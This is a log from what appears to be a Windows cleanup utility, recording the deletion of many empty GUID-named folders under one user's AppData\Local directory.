Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{3B6D98C0-BB75-4B24-8F40-0BFE2DF6AF34}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{3BBE72E3-B5CF-4DD6-9A4C-7E7975ABB366}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{3C05B146-509F-4F28-B8D2-73ADD68601B1}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{3C5D7E22-3BA4-4E8D-9034-692CC87A5D36}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{3C981733-5376-4580-8B38-2647FE9CA625}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{3CC6ED26-B973-4560-B156-7849DF1B1288}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{3DFE3345-8F4F-4D71-A454-C47022E78EF3}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{3FB5BA5B-57DA-40D1-A00A-D0E6AAB8A7A6}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{402262E8-A1E8-4AF3-85D9-39BDDBA86466}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{40FD4CF0-7C58-4F1B-8182-BA230177B3B9}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{415B4DD7-FC48-4270-8982-2639F47555C2}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{41F1CF2C-943D-4AF7-A3B8-79071360BA27}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{437FA777-29CF-4390-86B0-9CBAB6A4069D}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{43D4C00A-801C-4412-859C-55A9D4074C03}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{43FCE76D-584C-4B38-9728-81A481E215B9}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{44949AE1-AA6E-457E-9339-F28235879C5A}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{44FC9EA9-D23A-4C5B-B501-920796CE99CB}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{45216796-03D4-4744-9336-3246045BBCEC}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{4646FC89-D9AC-416A-947C-D48BA77D40FC}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{464EC5AC-4A23-4F45-A300-16A1CD95B43A}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{4692D8A9-DAEA-41F6-A2AA-EC806030E9F7}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{46CE74C2-C02A-47FF-9203-15C40280BCF9}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{4785093C-7233-4740-BC9B-5C0E0CCCBB35}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{48100997-1940-4EC7-A163-97A62E0B7ABE}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{4844B13F-597B-49D9-AB6D-29BF8DC95A34}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{49345764-E059-40BF-A859-960A3B589EAB}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{4A73BD07-CFE7-47A9-8CCE-3AA6258ED595}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{4ADBD76D-7162-4A26-B376-7FFFD724DAFE}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{4B57C7BB-D0A3-4FE7-8255-12A8679699A5}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{4C25D95A-92CD-4D49-B830-62BDE117C2C2}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{4CC74A13-4B4A-4A18-A50D-4A0F6F5DE2E3}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{4E97B7CE-B468-4BFB-9CEA-F3150002F1C8}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{514511D7-06ED-4AA6-91AD-15ECAAE17CB4}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{5163FDB1-9FF3-436E-B68C-C5B77DEB2974}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{51DCBF2F-3753-4706-AD59-2D395D4D6284}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{52DB0462-8F03-4B86-80B5-6945F9C3A97D}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{53B7DF05-305D-4EED-8A48-BB6712614376}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{554A5B0F-33FC-405F-80CB-9B41EA449695}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{5577FEA4-FA79-4CDC-B349-38EB34BA1CD7}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{55C09FF1-F9C3-429C-90F6-961313C01B33}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{5683FD18-0436-4DE7-8422-ED0B56CDC7FD}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{56D3763E-B4C6-45E1-8D38-763A1C5952E2}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{5714B1F7-0546-4E67-B091-81A03BB5DA63}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{57F7FED0-6FF8-476F-938F-A45324F13683}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{59211CD4-09E7-4019-A783-A204A633B412}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{598B0DC0-186B-449C-AAB7-FBDA539B68DF}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{5BADF287-2269-40BB-ACD7-8CBBB8351688}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{5CF2221C-FA78-43B9-B95D-A480E11240A0}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{5D3056CB-540D-4BF9-AE11-F5850BBC5CB6}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{5DCC3294-1F75-45E3-A725-C77131028007}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{5FF6AB0A-45BF-4184-A2D5-FC9103431C3F}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{60019E06-C7E8-49F2-91AE-45F46D504765}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{600BAEBC-2ED7-49C3-9B0A-9C5992E84296}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{608CA6B2-BCA8-41DE-A248-D74C47844609}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{613397EF-1FB4-446F-B29A-EA12BBBF6AE8}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{620974A7-F9C9-4E50-BEAE-A5E9F988B6C6}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{62A9D214-95F8-4431-A4F2-19E402094D2E}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{63381465-094E-4F9B-B824-C38CF550804E}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{65CBDA3E-CB73-4D5E-B1DE-7BCC12C21D03}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{65DBD701-76A9-4B58-AE06-1A21D286A07C}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{6642EC56-8C93-4E3C-AD1A-D012787982D4}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{66CBAE20-878C-4018-B12A-E42E2644C80F}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{6760AB22-1CF9-405D-B519-13138B0223E7}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{67879698-F4B4-4E6F-8919-CF75D7D3FCF3}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{678AE084-00A5-4FCD-AE39-1506072F81E1}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{68FE6C8B-A6DE-421E-98EC-49C90A94E31A}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{6AB1981E-1158-47E5-89A7-DDCD68735644}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{6AB22193-2A4C-40CC-B616-A3FE72EB63AC}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{6AE7B98D-0C6B-40E0-B706-E296211BE2EC}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{6B156506-A237-4374-9B16-D1A6FD136021}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{6BD08FE4-F788-4D9C-86F0-2D16223C5B3B}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{6CEED4D0-FDB0-4808-AC27-65E02B93E1D4}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{6CF33170-FDD3-4F28-AB94-4A2985901B31}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{6DD2E6B1-6EB8-4033-907D-A6A70773FF26}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{6E406A5E-D53B-4FA9-81D4-CA4B94670463}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{6E62F7A0-CB60-48D2-BE9D-F85575316916}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{7186F46B-51BB-4BEA-A1D6-28247DE43416}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{71BBA2C2-BC6F-40FB-97E1-CBBB632A4BD7}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{727E46EC-470F-4DA3-BFF1-0FBA30F31381}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{73127E03-CE7E-4CD2-8285-67BBF44CEE5C}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{7446AA53-8156-4162-A2D1-3AF2C500BA7D}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{7521334B-276B-4871-ACB7-A0AC59BC855F}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{767BE67D-B382-40F4-B54E-27EA3780ECC0}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{76D5B4F0-1164-429A-8EE3-9ECC8A328C3F}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{77E7422D-F4D6-4BA8-BAAA-3CBB7F16CBC6}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{77F2AD53-B52F-454D-B953-6FDA96A6D4AB}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{7886464B-BAEF-4607-A2F4-83F9E0F09A5D}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{78AC5349-8E6F-4335-9E8A-E43A78A64601}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{7A286530-7A5C-452D-BA7B-B2151CE358F2}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{7A934B44-E1B5-4D51-AD6B-9D4AC3EFD86B}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{7C0BD888-538B-49CF-B11C-64022DC2E8F7}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{7C375677-41A1-45FF-9C81-29168A1C0D60}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{7C8282AF-94F5-4261-9E20-62F591AE3526}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{7CD60C9B-8BC8-4C9B-8A10-C0E66CC92EAB}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{7D9BB5D1-1E7C-4955-A6F5-F447174FEBD4}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{7E4916BE-7EFB-4ABE-8062-297FFCA33404}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{81FE15EA-6313-4147-866C-102244999208}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{820BCAB7-64C7-4CD5-80F4-DD5AC2557A13}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{82219424-D1D1-4CFC-A08A-C73D2E70D791}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{82F68DF4-7715-4DCE-8204-C1CAB721B2F8}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{82FF28B4-03D1-4400-BAD4-0C7A984A5E05}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{837E3F96-5FE1-4A48-91D0-9F87F0CEAC5A}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{83EDE8C1-986C-4809-8EE6-7D9B31E72941}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{8562D62A-F2C1-4104-A4BB-B6CE7F9C9273}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{85983CD1-88A5-4E26-96F7-CE1F5B431121}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{868E48E5-784A-4ABC-90A0-7EF564CC3C3A}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{86F0C5B9-36F7-4AA5-A2C7-DDE8808C73EE}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{87181EB2-11A5-4C75-9F5D-AA3FB2159EF3}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{87506789-CFF6-4C0C-913B-5EB43E872A16}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{87738DDD-84B5-4223-8971-B418CD7355BB}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{8934154C-FF16-47CA-8FC3-34506CE9E6BA}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{8976C8E5-659E-4B8C-A5C1-6B76227F8468}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{8A1C8348-371C-45F6-AD97-7CC7C2DE4DA7}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{8A5550E6-ACE6-4648-AA8B-5479A638F81B}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{8B5C49F9-7932-4A7E-ABFF-701CB9CC4810}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{8C3FF4BE-A6A5-433F-A0BD-36F025347500}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{8D3F84F3-DDBC-46F8-A5C9-F4D597311D55}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{8DEF28D4-C522-4FD2-867D-73052DDE807B}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{8EA6A8F7-163F-4913-A6F2-71A602871690}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{8FF12058-25F7-4079-8B79-7736474CFA63}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{904E8CD4-E719-4605-AD9F-0B2FF521419A}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{90D638A4-198D-4816-A727-AD4169CCBE4A}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{930CA672-40D3-4D38-9150-224151243EFB}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{935B0D4E-C917-44C7-904C-BF7B9FEA6EB7}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{93BB3EE3-7FFA-4596-BFB3-050AE3354E41}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{944FB249-D3FB-4DC7-8DF9-B382C3706C6F}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{9645B654-5704-4AE9-8443-7ACCD9B1C08B}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{97E657DC-6AAF-4E11-ABDC-C68987ABC8EF}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{9811E454-CA00-4BDC-AC79-107C037737DB}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{98250120-6282-4E92-85F9-5285FF826490}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{9AB05918-B3A6-45E4-9326-D564BAAE507B}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{9B0DCF8E-8BEF-4E72-B3B3-317D8A1895CE}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{9B16FCA4-D3BB-424A-B3EC-9F8899D63E23}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{9BD98BE5-09E8-44C8-9197-36B3A6F5CEA5}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{9C72523A-BA89-4062-9444-490AD378AAB9}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{9D0D9360-AF32-4901-A786-B815F8B83692}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{9E53071E-D2DA-4D95-A09A-993F4705E14E}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{9E82F9AA-2999-4690-8914-F2C4FC88AC06}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{9FE2FA51-14BA-4FB5-AD0B-18D5ACC7C326}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{9FF75A05-9E71-4F03-8F27-07281CB0F9E4}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{A0005E8E-3A67-4489-9D21-F35AFFD22C64}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{A0149361-1831-4D87-B8EF-31E00D3055E6}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{A025E107-0BA7-414D-8264-7F690FE4FA57}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{A1E44F49-5EBF-4316-874B-5C44B89791E7}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{A2CD12EC-4E56-465E-9E90-6BDF9F2B0DC1}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{A2E5B476-0377-456B-8CFC-F396E05B8C11}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{A33C6AFA-FF7B-4E61-AA3B-BC9A698C6B92}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{A363E48F-A563-4DA6-AF61-E5D6104672C1}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{A4688195-87AE-4DC4-9F1D-CA0BAAF6904B}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{A57C6408-D01B-4B82-9C45-DC0F8B8DFBF1}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{A5C41B38-3A4E-4F2E-BDCC-B2661E0907A6}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{A66ECA52-AF5A-43D1-BEC6-D968846A1B38}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{A6A7078A-1FD3-446D-8E09-FF03AC281463}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{A7C181A5-ECA3-456A-8E27-DAC8150AD797}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{A875C49F-EBDB-44CD-BE8D-ED75F3708980}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{A87C5597-C0E6-4E18-9303-192B0A51A6C9}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{AA58CA79-4139-45FD-95D2-B8574EB3A6F8}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{AA9E0EBA-EC22-4B5E-A41B-78941F3D1171}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{AAF03004-804C-4074-A4D1-A8DC4CAFFC8F}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{AC5F6766-3906-426D-934D-128FE52204D9}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{ACA9EEA7-0D39-4BBA-96E2-C5EEEDACC196}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{AE118474-F1FF-4407-B4FE-C5659065DE69}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{AFD3F525-9824-4882-A6C1-15BADAE73957}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{B062D162-4962-4B49-B1B7-71087AC2A987}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{B1767A45-63C9-4733-B770-1EC7A3725216}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{B1B8C3A6-1A7E-4C42-9DEF-9C8E7E55F2BD}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{B1C10492-8B70-4116-9209-4F4E977E5CE7}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{B1E1A4E4-9F26-4454-A5E5-78286CD83688}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{B21D0BAD-63B0-45EC-B130-1E0175288363}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{B2D28A4E-0DCC-4651-9F65-5B950304CA44}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{B3382041-2AEF-441B-B341-B9C1D9064E4B}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{B4884FF3-6B21-4342-9584-9841D4E58633}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{B4BA3794-1C66-461D-A5B8-F0E1889151E3}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{B51A4279-6F36-4583-B22B-6D77473E55CC}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{B5467ADD-9B46-423D-8CC4-AD438614D046}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{B62CB8C7-7B9A-428A-9249-DD8103351856}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{B6DCD71C-BFA5-4C74-8BAB-AE998E92DA98}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{B731F206-977C-4ECD-BDF5-9A34C6D96005}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{B7B06C8F-66DD-4E6F-B30F-EB462424CD29}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{BA65C464-72D5-4D69-8044-D7022057C824}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{BAD086A4-8235-4426-B72A-B5FD8ABEC6BE}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{BB6E3157-BDA6-4F84-B2CE-7DE57F8553FB}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{BC097D22-DFF9-4A3B-91F5-401A6212F336}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{BC69B09D-42B1-485F-93B9-6C5DF26EE39B}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{BCBAE74D-05A0-46FA-BDE5-1E271DB7B529}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{BCCD4D09-616D-4916-9B17-08F75C4723E6}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{BD0986D0-6FD5-42C7-BADA-3C10D4B128FB}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{BDA2DE19-06AF-4AA8-878F-EB169D75B99C}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{BE68C4F2-6DB0-49C6-876B-FF10ECA1233F}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{BEA02DF4-A22E-4852-B723-D97C2E51624F}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{C04D7698-C8E5-43C8-8C46-9652EBB37389}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{C0833A28-7317-4D99-9DCB-37A7937BF24E}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{C132A37E-61B2-4600-8F86-07B2AC3E8E90}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{C3CDD61C-795D-4BB6-B142-8502CD8BB50F}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{C43885FC-D5B3-43C9-ABB0-A7090BFA549E}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{C570CB17-87AE-423D-A450-FAD239560618}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{C6D00E8A-5BE5-478D-8C52-DE3024601C74}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{C7CD36FF-77DA-4718-A92F-F426AA73531E}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{C80CB65B-9ECA-4D73-AE35-54789D5A2F27}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{C8D5B03D-EBE6-44A5-9AC0-2582C97F2F58}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{C9C509C0-471C-4CD2-95B0-A4FA9D6C46E5}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{CA9DBB38-0007-4C46-9DEA-5FEEF88EEA48}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{CB91B87B-58AD-487D-9B17-A83C7B7F26B6}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{CC3442A4-8CC0-4B62-9720-C9E294CAB265}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{CCFBB2E1-3305-47F4-8400-6F314836E89A}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{CD960B3D-2F75-46C8-996B-81FFFE517AF3}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{CE95F6CF-CBA8-4EF4-90CD-ECB89372669F}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{CFE5BD9E-0420-4213-A7AB-EDC63202EABF}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{D07D82BA-6753-4E68-8E98-C4FE2948C1C1}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{D0BF8BC4-0A76-428D-B4F4-BDE1AA8E78DB}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{D13C8F73-630F-46B4-8750-E356E17F1141}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{D23C195E-07F8-4319-A1A8-A9481684CB16}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{D2A5D46D-9F74-4EEB-B304-46796E08D9F8}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{D2F52242-C51F-44B7-AE4A-4FDB36BCE729}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{D47CD629-158D-416C-AEA1-491FC2BFD429}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{D4A55FE1-CD21-448D-A817-B5EA960DC8C1}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{D4E5255B-BF53-4AC5-9A04-EDE949B71708}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{D51A05DF-F1F2-4E66-8A97-A95F34C46EE6}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{D62156C9-AB56-41B3-A8B7-4411D9C4438A}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{D65348F5-AB5D-4D43-9223-6ACA13ACC92F}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{D7B73F35-6FDB-4E24-8F66-4FA993164476}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{D8225CB5-F3C2-4639-BE6C-4700421E2747}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{D8679FF4-42F1-4EE0-998D-AE5B507CDB77}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{D8A064FE-66C4-4836-A120-22E8B8C120E8}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{D8AC3F85-5F35-42BB-A37D-00559DEAF12F}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{D8B9A70B-DE59-4CD7-977B-482CD09FB57C}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{D919C433-8363-4D3C-A480-5BA27D6AE383}
